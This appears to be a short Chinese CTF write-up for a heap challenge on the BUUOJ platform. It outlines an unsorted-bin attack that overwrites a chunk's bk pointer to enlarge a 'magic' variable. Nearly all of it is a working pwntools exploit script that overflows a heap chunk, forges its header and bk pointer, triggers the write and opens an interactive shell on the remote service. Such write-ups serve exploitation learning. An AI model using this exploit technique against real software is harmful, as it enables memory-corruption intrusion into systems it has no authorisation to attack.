【unstored bin attack】
1.ida分析
2.思路
- 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数
3.exp
from pwn import *
p = remote('node3.buuoj.cn',25879)
context.log_level = 'debug'
def add(size,cont):
p.sendlineafter('Your choice :',str(1))
p.sendlineafter('Size of Heap : ',str(size))
if len(cont) == size:
p.sendafter('Content of heap:',cont)
else:
p.sendlineafter('Content of heap:',cont)
def edit(index,size,cont):
p.sendlineafter('Your choice :',str(2))
p.sendlineafter('Index :',str(index))
p.sendlineafter('Size of Heap : ',str(size))
if len(cont) == size:
p.sendafter('Content of heap : ',cont)
else:
p.sendlineafter('Content of heap: ',cont)
def dele(index):
p.sendlineafter('Your choice :',str(3))
p.sendlineafter('Index :',str(index))
add(0x10,'a')
add(0x80,'b')
add(0x60,'c')
add(0x10,'d')
dele(1)
payload = 'b'*0x10 + p64(0) + p64(0x91) + p64(0) +p64(0x6020a0-16)
edit(0,len(payload),payload)
add(0x80,'dddd')
p.sendline('4869')
p.interactive()